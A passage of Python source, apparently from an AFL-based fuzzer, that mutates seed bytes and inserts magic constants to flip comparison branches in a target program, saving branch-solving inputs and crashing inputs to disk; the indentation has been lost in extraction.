f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance > 0 and init_distance <= 0) or (distance <= 0 and init_distance > 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance > 0 and init_distance <= 0) or (distance <= 0 and init_distance > 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance > 0:
# construct an equal case to satisfy <= case
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct an > case to safisfy > case
if constant_loc == 2:
magic_ori = struct.pack("@Q", int(constant_magic)+1)
elif constant_loc == 1:
if int(constant_magic) == 0:
continue
magic_ori = struct.pack("@Q", int(constant_magic)-1)
else:
print("error")
sys.exit(0)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance > 0 and hit == 2) or (init_distance <= 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance > 0 and hit == 2) or (init_distance <= 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
if br_type == 2 or br_type == 7 or br_type == 11:
t0 = time.time()
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
t1 = time.time()
print("obtain_br time cost " + str(t1-t0))
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
t2 = time.time()
print("parse obtain_br result time cost " + str(t2-t1))
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance == 0 and init_distance != 0) or (distance != 0 and init_distance == 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidtate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance == 0 and init_distance != 0) or (distance != 0 and init_distance == 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance == 0 and init_distance != 0) or (distance != 0 and init_distance == 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
t3 = time.time()
print("parse distance result time cost " + str(t3-t2))
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance != 0:
# construct an equal case to satisfy == case
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct an inequality case to safisfy != case
magic_ori = struct.pack("@Q", int(constant_magic)+1)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance == 0 and hit == 2) or (init_distance != 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance == 0 and hit == 2) or (init_distance != 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
t4 = time.time()
print("crack time cost " + str(t4-t3))
#'''
if br_type == 3 or br_type == 4:
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance >= 0 and init_distance < 0) or (distance < 0 and init_distance >= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidtate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance >= 0 and init_distance < 0) or (distance < 0 and init_distance >= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance >= 0 and init_distance < 0) or (distance < 0 and init_distance >= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance < 0:
# construct a equal case to staisfy >=
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct an < case to safisfy < case
if constant_loc == 2:
if int(constant_magic) == 0:
continue
magic_ori = struct.pack("@Q", int(constant_magic)-1)
elif constant_loc == 1:
magic_ori = struct.pack("@Q", int(constant_magic)+1)
else:
print("error")
sys.exit(0)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance >= 0 and hit == 2) or (init_distance < 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance >= 0 and hit == 2) or (init_distance < 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
if br_type == 5 or br_type == 6:
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance < 0 and init_distance >= 0) or (distance >= 0 and init_distance < 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidtate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance < 0 and init_distance >= 0) or (distance >= 0 and init_distance < 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance < 0 and init_distance >= 0) or (distance >= 0 and init_distance < 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance < 0:
# construct an equal case to satisfy >= case
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct an < case to safisfy < case
if constant_loc == 2:
if int(constant_magic) == 0:
continue
magic_ori = struct.pack("@Q", int(constant_magic)-1)
elif constant_loc == 1:
magic_ori = struct.pack("@Q", int(constant_magic)+1)
else:
print("error")
sys.exit(0)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance < 0 and hit == 2) or (init_distance >= 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance < 0 and hit == 2) or (init_distance >= 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
if br_type == 8 or br_type == 9:
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance <= 0 and init_distance > 0) or (distance > 0 and init_distance <= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidtate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
